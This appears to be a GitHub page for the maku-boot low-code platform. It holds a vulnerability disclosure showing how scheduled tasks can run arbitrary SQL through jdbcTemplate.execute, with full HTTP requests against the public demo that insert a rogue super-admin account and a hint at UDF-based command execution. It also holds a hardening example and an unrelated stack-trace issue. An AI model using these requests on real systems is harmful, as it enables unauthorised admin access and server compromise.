
makunet / maku-boot


A low-code development platform built with SpringBoot3.3, SpringSecurity6.3, Mybatis-Plus, Vue3, Element-plus and related technologies, intended to give developers a simple, efficient and extensible low-code platform. It has a very low barrier to entry, supports SM (Chinese national standard) cryptography and the Dameng database, and meets Xinchuang (domestic IT) requirements.

Home Page: https://maku.net

License: GNU Affero General Public License v3.0

Java 96.66% Dockerfile 0.06% FreeMarker 3.27%
java springsecurity mybatis-plus springboot

maku-boot's People

Contributors

15989873773, bear-coco, googlb, hcattt, ibabamu, lyon1994, shuaizai8888, tangweixin


maku-boot's Issues

Any sql statement execution vulnerability

Impact

version:maku-boot v1.3.0-v2.2.0
Users with "schedule" permissions can execute arbitrary SQL statements, and even achieve RCE

Code Audit

The vulnerability code is located at:

  1. https://github.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
  2. https://gitee.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java

Need to find an exploitable method that satisfies the following conditions:

  • The class that defines the method is in the spring bean container.
  • The method has only one parameter, and the parameter type must be a string.
  • The method must be public.

Deploy maku-boot locally and write auxiliary code to find a method that meets the above conditions:

Visit http://localhost:8080/index

Find the org.springframework.jdbc.core.JdbcTemplate#execute(java.lang.String) method; this method can execute any SQL statement.
The next section is the exploit procedure

Steps to reproduce

Visit the official demo site: https://demo.maku.net/maku-boot/#/login

  1. Log in as user name 'admin' and password 'admin'.

  2. Go to https://demo.maku.net/maku-boot/#/quartz/schedule/index and add timing task after a successful login.
    Click the Add button in the image below.

Fill in the following important parameters and click the submit button in the image below:

  • bean name: jdbcTemplate
  • method name: execute
  • method param: INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());


The packet is as follows:

POST /maku-boot-server/schedule HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 583
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":"","jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":""}
  3. Click the run button in the image below to execute the scheduled task you just created.

The packet is as follows:

PUT /maku-boot-server/schedule/run HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 618
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":24,"jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, '[email protected]', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":"","createTime":"2022-11-07 11:23:34"}

After the SQL statement is successfully executed, an administrator user test123/admin is created.

  4. Log in to the system as test123/admin

The packet is as follows:

POST /maku-boot-server/sys/auth/login HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 104
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"username":"test123","password":"admin","key":"30aef83e-2804-49ea-acb5-b5678cdc27dc","captcha":"bdrgr"}

Login successful

In addition, since arbitrary SQL statements can be executed and maku-boot supports MySQL and PostgreSQL databases, a UDF may be used to escalate privileges and execute commands.
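The three conditions listed in the code audit (bean present in the container, public, exactly one String parameter) are all that the reflective job runner checks, which is why a framework bean such as JdbcTemplate#execute becomes callable from a scheduled task. The Java class below is an added example, not maku-boot's own code, showing how such an invoker can be restricted to an explicit bean-name allowlist plus an opt-in method annotation; the Function-based bean lookup (a stand-in for ApplicationContext#getBean), the ScheduledTask annotation and the demo beans are all constructed for this example.

```java
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
import java.lang.reflect.Method;
import java.util.Map;
import java.util.Set;
import java.util.function.Function;

public class ScheduleJobInvoker {
    /** Opt-in marker: only methods carrying this annotation may be scheduled. */
    @Retention(RetentionPolicy.RUNTIME)
    @Target(ElementType.METHOD)
    public @interface ScheduledTask {}
    // Stand-in for ApplicationContext#getBean(String), so the example runs without Spring.
    private final Function<String, Object> beanLookup;
    // Explicit allowlist of job beans; framework beans such as jdbcTemplate are never on it.
    private final Set<String> allowedBeans;

    public ScheduleJobInvoker(Function<String, Object> beanLookup, Set<String> allowedBeans) {
        this.beanLookup = beanLookup;
        this.allowedBeans = allowedBeans;
    }

    /** The pattern the report describes: any bean, any public method taking one String. */
    public Object invokeUnchecked(String beanName, String methodName, String params) throws Exception {
        Object target = beanLookup.apply(beanName);
        Method m = target.getClass().getMethod(methodName, String.class);
        return m.invoke(target, params);
    }

    /** Hardened variant: allowlisted bean name and @ScheduledTask-annotated method only. */
    public Object invokeChecked(String beanName, String methodName, String params) throws Exception {
        if (!allowedBeans.contains(beanName)) {
            throw new IllegalArgumentException("bean not permitted for scheduling: " + beanName);
        }
        Object target = beanLookup.apply(beanName);
        if (target == null) {
            throw new IllegalArgumentException("no such bean: " + beanName);
        }
        Method m = target.getClass().getMethod(methodName, String.class);
        if (!m.isAnnotationPresent(ScheduledTask.class)) {
            throw new IllegalArgumentException("method not marked @ScheduledTask: " + methodName);
        }
        return m.invoke(target, params);
    }

    /** Constructed demo beans standing in for a real job bean and for JdbcTemplate. */
    public static class ReportJob {
        @ScheduledTask
        public String generate(String scope) { return "report generated for " + scope; }
    }
    public static class FakeJdbcTemplate {
        public void execute(String sql) { System.out.println("would execute SQL: " + sql); }
    }

    public static void main(String[] args) throws Exception {
        Map<String, Object> beans = Map.of("reportJob", new ReportJob(), "jdbcTemplate", new FakeJdbcTemplate());
        ScheduleJobInvoker invoker = new ScheduleJobInvoker(beans::get, Set.of("reportJob"));
        System.out.println(invoker.invokeChecked("reportJob", "generate", "daily"));
        try {
            invoker.invokeChecked("jdbcTemplate", "execute", "SELECT 1"); // rejected before any reflection
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist check runs before the bean is even resolved, so the task definition a low-privileged "schedule" user submits can never reach a bean that was not deliberately registered as a job target.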

com.fhs.trans.utils.TransUtil : If a field is set incorrectly, please report it to the easytrans developers

2023-07-27 17:51:40.610 ERROR 2836 --- [nio-8081-exec-3] com.fhs.trans.utils.TransUtil : 如果字段set错误,请反馈给easytrans开发者

java.lang.reflect.InaccessibleObjectException: Unable to make field private final java.lang.String java.lang.Enum.name accessible: module java.base does not "opens java.lang" to unnamed module @3576ddc2
at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:387)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:363)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:311)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:181)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:175)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:202)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.utils.TransUtil.transFields(TransUtil.java:219)
at com.fhs.trans.utils.TransUtil.transOne(TransUtil.java:181)
at com.fhs.trans.advice.EasyTransResponseBodyAdvice.beforeBodyWrite(EasyTransResponseBodyAdvice.java:61)
... (Spring MVC, Spring Security and Tomcat filter-chain frames omitted)
My API returns results normally and the data is also correct, yet this error appears. What is going on?
